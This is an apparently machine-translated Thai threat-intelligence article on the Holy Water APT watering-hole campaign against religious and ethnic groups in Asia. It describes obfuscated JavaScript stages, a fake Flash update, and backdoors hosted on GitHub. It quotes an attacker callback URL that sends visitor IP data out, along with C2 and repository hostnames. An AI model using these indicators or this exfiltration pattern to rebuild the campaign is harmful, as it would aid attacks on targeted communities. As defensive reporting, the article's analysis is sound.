Holy Water APT

Holy Water APT เป็นชื่อที่มอบให้กับกลุ่มอาชญากรไซเบอร์ที่ทำการโจมตีประเภทหลุมน้ำต่อกลุ่มศาสนาและชาติพันธุ์ในเอเชีย TTP (กลยุทธ์ เทคนิค และขั้นตอน) ของการโจมตีครั้งนี้ไม่สามารถนำมาประกอบกับตัวแสดง ATP (ภัยคุกคามถาวรขั้นสูง) ที่เป็นที่รู้จักอยู่แล้ว ซึ่งทำให้นักวิจัยสรุปได้ว่านี่คือกลุ่มอาชญากรไซเบอร์กลุ่มใหม่ที่แสดงคุณลักษณะของ ทีมแฮ็กเกอร์ขนาดเล็กและยืดหยุ่น

เพื่อทำการโจมตีในแอ่งน้ำ อาชญากรกำหนดเป้าหมายเว็บไซต์หลายแห่งที่เข้าชมโดยเป้าหมายที่กำหนดบ่อยๆ ไซต์สามารถเป็นขององค์กร องค์กรการกุศล หรือบุคคลผู้มีอิทธิพลที่อยู่ในกลุ่มเป้าหมายได้ เว็บไซต์ทั้งหมดที่ถูกบุกรุกโดย Holy Water ถูกโฮสต์บนเซิร์ฟเวอร์เดียวกันและรวมถึงบุคลิกภาพทางศาสนา การกุศล โครงการบริการโดยสมัครใจ และองค์กรการค้าที่เป็นธรรม เป็นต้น

การโจมตีรวมหลายขั้นตอน

เมื่อเยี่ยมชมเว็บไซต์ที่ถูกบุกรุก ผู้ใช้จะเข้าสู่ขั้นตอนการโจมตีครั้งแรกที่ประกอบด้วย JavaScript ชื่อ (script|jquery)-css.js ที่เสียหาย และปิดบังด้วย Sojson ซึ่งเป็นบริการบนเว็บในจีน บทบาทของสคริปต์นี้คือการพิจารณาว่าผู้ใช้เป็นเป้าหมายที่ถูกต้องหรือไม่ และเพย์โหลดจะเริ่มดึงข้อมูลผู้เยี่ยมชมและส่งไปยังเซิร์ฟเวอร์ภายนอกที่ loginwebmailnic.dynssl[.]com ผ่านคำขอ HTTP GET:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

การตอบสนองจากเซิร์ฟเวอร์ส่งกลับผลลัพธ์จริงหรือเท็จ และหากค่าเป็นจริง ขั้นตอนต่อไปของการโจมตีจะถูกทริกเกอร์ มิฉะนั้นจะไม่มีอะไรเกิดขึ้น

ในระหว่างขั้นตอนที่สอง JavaScript ชื่อ (script|jquery)-file.js ซึ่งทำให้งงในลักษณะเดียวกันอีกครั้ง อย่างไรก็ตาม คราวนี้แฮกเกอร์ใช้ Sojson v5 แทน v4 เพื่อให้ผู้ใช้ติดเชื้อ Holy Water APT จะไม่ใช้ประโยชน์จากช่องโหว่หรือจุดอ่อนของซอฟต์แวร์ แต่จะมีการสร้างหน้าต่างป๊อปอัปที่นำเสนอการอัปเดตโปรแกรมเล่น Flash และผู้ที่อาจตกเป็นเหยื่อต้องยินยอมให้ดาวน์โหลดไฟล์

Arsenal of Malware Tools ของ Holy Water APT ถูกโฮสต์บน GitHub

หากผู้ใช้จะช่วยให้การปรับปรุงปลอม Flash เพื่อดำเนินการต่อไปมันจะเชื่อมต่อไปเป็นที่เก็บ GitHub ไม่มีการใช้งานอยู่ที่ github.com/AdobeFlash32/FlashUpdate เครื่องมือสี่ชุดที่แตกต่างกันถูกจัดเก็บไว้ในตำแหน่งนั้น - แพ็คเกจตัวติดตั้ง มัลแวร์แบ็คดอร์ที่ตั้งชื่อโดยนักวิจัย Godlike12 และแบ็คดอร์ Python แบบโอเพนซอร์ซสองเวอร์ชันที่รู้จักกันในชื่อ Stitch ซึ่งได้รับการแก้ไขโดยแฮกเกอร์ที่มีฟังก์ชันการทำงานที่เพิ่มขึ้น แพคเกจโปรแกรมปรับปรุงคือโปรแกรมติดตั้ง NSIS ที่ปล่อยตัวติดตั้ง Windows Flash Player ที่ถูกต้องและเครื่องมือ stager ที่ใช้ในการโหลดเพย์โหลดจริง แบ็คดอร์ Godlike12 เขียนด้วยภาษา Go และใช้เพื่อติดตั้งช่อง Google Drive กับเซิร์ฟเวอร์ Command and Control (C&C, C2) สำหรับแบ็คดอร์รุ่นต่างๆ ของ Stitch นอกเหนือจากกิจกรรมแบ็คดอร์ตามปกติ เช่น การเก็บรวบรวมข้อมูลและรหัสผ่าน การบันทึกกิจกรรม การดาวน์โหลดไฟล์ เป็นต้น กลุ่ม Holy Water ได้เพิ่มความสามารถในการดาวน์โหลดโปรแกรม Adobe Flash Installation เพื่ออัปเดตอัตโนมัติ ตัวเองจาก ubntrooters.serveuser.com และบรรลุความคงอยู่โดยใช้ประโยชน์จากงานที่กำหนดเวลาไว้